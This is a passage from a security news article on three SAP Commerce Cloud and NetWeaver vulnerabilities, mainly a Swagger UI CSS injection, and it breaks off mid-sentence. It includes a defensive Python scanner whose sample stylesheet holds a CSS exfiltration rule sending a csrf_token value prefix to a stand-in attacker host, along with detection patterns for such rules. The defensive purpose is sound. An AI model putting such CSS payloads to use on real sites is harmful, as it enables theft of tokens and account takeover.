Critical SAP NetWeaver and CX Commerce Flaw Leads To Complete Takeover


Three vulnerabilities, involving CSS injection, file upload, and remote code execution, have been discovered in SAP Customer Experience (CX) Commerce Cloud and SAP NetWeaver Application Server.

Two of them have been assigned CVE-2019-17495 and CVE-2022-36364.

Their severities are 9.8 (Critical) for CVE-2019-17495 and 8.8 (High) for CVE-2022-36364, respectively.

CVE-2019-17495 exists in the Swagger UI library, and CVE-2022-36364 exists in the Apache Calcite Avatica library used in SAP Commerce Cloud.


The third, the file upload vulnerability CVE-2024-33006, exists in SAP NetWeaver Application Server ABAP and the ABAP (Advanced Business Application Programming) Platform.

The severity for this vulnerability has been given as 9.8 (Critical).

All of these vulnerabilities have been patched as part of the HotNews update for May 2024 by SAP.

Vulnerability Analysis

CVE-2019-17495: Cascading Style Sheets (CSS) Injection Vulnerability In Swagger UI

This vulnerability in Swagger UI can be exploited by a threat actor using the Relative Path Overwrite (RPO) technique.

This, in turn, allows CSS-based exfiltration of input field values, such as a CSRF token.
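The exfiltration pattern described above has a recognisable shape in a stylesheet: an attribute selector that matches a prefix of an input's `value` combined with a declaration that fetches an external URL. The following is an added defender-side example, not code from the article or from the Swagger UI project: a small scanner that flags such rules in CSS a page serves, plus a check of the response headers that an RPO-style style injection depends on (a missing `X-Content-Type-Options: nosniff`, which lets a browser treat a non-CSS response as a stylesheet, and a missing Content-Security-Policy that would restrict style and fetch sources). The sample stylesheet, the `csrf_token` field name and the `attacker.example` hostname are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Constructed sample stylesheet (not from the page): one ordinary rule and one
# rule in the shape that CSS-based value exfiltration relies on, i.e. an
# attribute selector on an input's value prefix that triggers an external fetch.
SAMPLE_CSS = """
input[type=text] { border: 1px solid #ccc; }
input[name="csrf_token"][value^="a"] { background: url("https://attacker.example/leak?c=a"); }
"""

# Very small CSS rule splitter: "selector { declarations }" pairs, no nesting.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
# Attribute selector on the value attribute: [value=], [value^=], [value$=], [value*=].
VALUE_SELECTOR_RE = re.compile(r"\[\s*value\s*[\^\$\*]?=", re.I)
# A declaration that makes the browser fetch a remote resource.
EXTERNAL_FETCH_RE = re.compile(r"url\(\s*['\"]?\s*(https?:)?//", re.I)


@dataclass
class Finding:
    selector: str
    declarations: str


def find_value_exfil_rules(css: str) -> list[Finding]:
    """Return every rule whose selector keys on an input value and whose body
    fetches an external URL: the signature of CSS-based value exfiltration."""
    findings = []
    for selector, body in RULE_RE.findall(css):
        selector = " ".join(selector.split())
        if VALUE_SELECTOR_RE.search(selector) and EXTERNAL_FETCH_RE.search(body):
            findings.append(Finding(selector, body.strip()))
    return findings


def missing_rpo_hardening(headers: dict[str, str]) -> list[str]:
    """List hardening headers absent from an HTTP response. An RPO-based style
    injection needs the browser to accept a non-CSS response as a stylesheet;
    nosniff blocks that, and a CSP limits where styles and images may load from."""
    lower = {k.lower(): v for k, v in headers.items()}
    missing = []
    if lower.get("x-content-type-options", "").strip().lower() != "nosniff":
        missing.append("X-Content-Type-Options: nosniff")
    csp = lower.get("content-security-policy", "")
    if "style-src" not in csp and "default-src" not in csp:
        missing.append("Content-Security-Policy with style-src or default-src")
    return missing


if __name__ == "__main__":
    for f in find_value_exfil_rules(SAMPLE_CSS):
        print(f"suspicious rule: {f.selector} {{ {f.declarations} }}")
    # Constructed response headers for a page that sets neither protection.
    print(missing_rpo_hardening({"Content-Type": "text/html"}))
```

The scanner is deliberately conservative: it only reports a rule when both halves of the pattern are present, so ordinary `input[value=...]` styling without a remote fetch is not flagged. Run it over the CSS an application actually serves (including any stylesheet loaded via a relative path) and treat a hit, or a response missing the two headers, as something to investigate.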

To explain further, Swagger UI intentionally allows the embedding of untrusted JSON data from remote servers.

Nevertheless, it was not known previously that